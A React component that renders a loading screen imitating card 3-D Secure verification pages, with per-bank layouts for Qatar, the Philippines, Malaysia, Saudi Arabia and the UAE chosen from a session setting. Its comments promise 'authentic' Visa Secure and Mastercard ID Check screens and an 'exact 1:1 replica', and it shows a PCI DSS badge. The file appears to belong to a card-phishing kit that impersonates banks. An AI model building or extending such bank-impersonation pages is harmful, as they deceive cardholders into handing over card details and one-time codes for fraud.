import React from 'react';
import { isQatarBankDesign } from './qatar/QatarBankLayout';
import { isPhilippinesBankDesign } from './philippines/PhilippinesBankLayout';
import { isMalaysiaBankDesign } from './malaysia/MalaysiaBankLayout';
import { isKsaBankDesign } from './ksa/KsaBankLayout';
import { isUaeBankDesign } from './uae/UaeBankLayout';
import QatarLoading from './QatarLoading';
import UaeLoading from './uae/UaeLoading';
import { getTranslation } from '../Utils/i18n';
import { isMastercard } from '../Utils/cardScheme';
import './Loader.css';

export default function LoadingPage({ config }) {
  const mode = config?.mode || localStorage.getItem('session_mode') || ((typeof process !== 'undefined' && process.env.REACT_APP_MODE) || undefined) || 'standardEN';
  const t = getTranslation(mode);
  const isRtl = t.dir === 'rtl';
  const design = localStorage.getItem('session_design') || 'standard_visa_en';

  const isQatar = isQatarBankDesign(design);
  const isPH = isPhilippinesBankDesign(design);
  const isMY = isMalaysiaBankDesign(design);
  const isKSA = isKsaBankDesign(design);
  const isUae = isUaeBankDesign(design);
  const isMc = isMastercard(design);

  // 1. UAE Bank: Authentic iOS 12-bar spinner with Visa Secure / Mastercard ID Check
  if (isUae) {
    return <UaeLoading scheme={isMc ? 'mastercard' : 'visa'} />;
  }

  // 2. Qatar / Philippines / Malaysia / KSA: Modern Filling Progress Bar Animation
  if (isQatar || isPH || isMY || isKSA) {
    return <QatarLoading isRtl={isRtl} scheme={isMc ? 'mastercard' : 'visa'} />;
  }

  // 3. Standard 3DS: Exact 1:1 replica of manual/providers/3ds/Loading.jsx
  const imageSrc = isMc ? '/images/manual/master.jpg' : '/images/manual/visa.jpg';
  const altText = isMc ? 'Mastercard' : 'Visa';

  return (
    <div className="flex items-center justify-center w-full min-h-screen bg-white" style={{ minHeight: '100vh', display: 'flex', alignItems: 'center', justifyContent: 'center', backgroundColor: '#ffffff' }}>
      <div className="w-full max-w-sm px-6 py-8 bg-white border border-neutral-300" style={{ maxWidth: '24rem', width: '100%', padding: '2rem 1.5rem', backgroundColor: '#ffffff', border: '1px solid #d4d4d4', boxSizing: 'border-box' }}>
        <div className="flex flex-col items-center justify-between w-full mb-6" style={{ display: 'flex', flexDirection: 'column', alignItems: 'center', width: '100%' }}>
          <img
            src="/images/manual/pci.jpg"
            alt="PCI DSS Compliant"
            className="h-12 mr-4"
            style={{ height: '3rem', marginBottom: '1.5rem' }}
            onError={(e) => { e.target.style.display = 'none'; }}
          />

          <div className="my-6 mb-12 cus-loader" style={{ margin: '1.5rem 0 3rem' }}></div>

          {imageSrc && (
            <img 
              src={imageSrc} 
              alt={altText} 
              className="h-12" 
              style={{ height: '3rem' }}
              onError={(e) => { e.target.style.display = 'none'; }} 
            />
          )}
        </div>
      </div>
    </div>
  );
}

